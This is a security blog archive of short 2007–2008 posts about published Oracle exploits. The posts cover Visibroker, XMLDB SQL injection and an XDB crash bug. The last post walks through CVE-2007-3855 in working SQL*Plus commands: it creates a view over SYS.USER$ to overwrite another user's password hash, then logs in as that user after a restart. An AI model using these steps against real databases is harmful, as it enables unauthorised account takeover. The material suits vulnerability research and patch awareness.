4 Mrz 2008 von Alexander Kornbrust.

Today, Luigi Auriemma posted an advisory and heap overflow exploit for the Corba Visibroker 8.0 from Borland.

Visibroker was used by older versions of Oracle Reports (e.g. in the Oracle Application Server, Reports Developer or eBusiness Suite) and Oracle Discoverer. In Oracle 10g Release 2 Visibroker was replaced by the JDK ORB. Details see Metalink note 307669.1.

Geschrieben in Exploit, Oracle Security | Keine Kommentare »

31 Jan 2008 von Alexander Kornbrust.

The first exploits for CPU January 2008 were published on milw0rm.com.

Alexandr Polyakov from Digital Security published 4 exploits for XMLDB. Alexandr found and reported these vulnerabilities mid of december 2007 to Oracle. It seems that someone else reported these errors before because Oracle NEVER fixes vulnerabilities within less than a month.

• SQL Injection in PITRIG_DROP (1)
• SQL Injection in PITRIG_DROP (2)
• SQL Injection in PITRIG_TRUNCATE (1)
  
• SQL Injection in PITRIG_TRUNCATE (2)
  

Geschrieben in CPUJan2008, Exploit, SQL Injection | 7 Kommentare »

3 Nov 2007 von Alexander Kornbrust.

Yesterday an anonymous person (oraclefun@hushmail.com) posted an exploit for XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10.2 on the security mailing list bugtraq without any explanation about affected versions. I did a few tests and tested this exploit against my test databases. Unpatched Oracle 10.2.0.1 and 10.2.0.2 databases are terminated immediately.

This exploit is using IDS evasion techniques to avoid detection from network based IDS for Oracle.

To run this exploit only the privilege “create session” is required. 10.2.0.3 is not affected from this exploit.

Oracle 9i Rel. 1, 9i Rel. 2, 10g Rel.1 and 11g are not affected and throw error messages.

######### 9.2.0.8 , 10.1.0.5 #########
ERROR at line 22:
ORA-06550: line 22, column 1:
PLS-00201: identifier ‘XDB.XDB_PITRIG_PKG’ must be declared
ORA-06550: line 22, column 1:
PL/SQL: Statement ignored
#########

######### 10.2.0.3 or 11g #########
ERROR at line 1:
ORA-29329: Table not of type XMLType
ORA-06512: at “XDB.XDB_PITRIG_PKG”, line 127
ORA-06512: at line 22
#########

Geschrieben in Exploit, Oracle Security, Allgemein | Keine Kommentare »

22 Jul 2007 von Alexander Kornbrust.

Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.

Example:
– We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– The password is now changed to HACKED.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9

– But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– To activate the password change it is necessary to restart the database.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

Geschrieben in Exploit, CPUJul2007, Oracle Security | 5 Kommentare »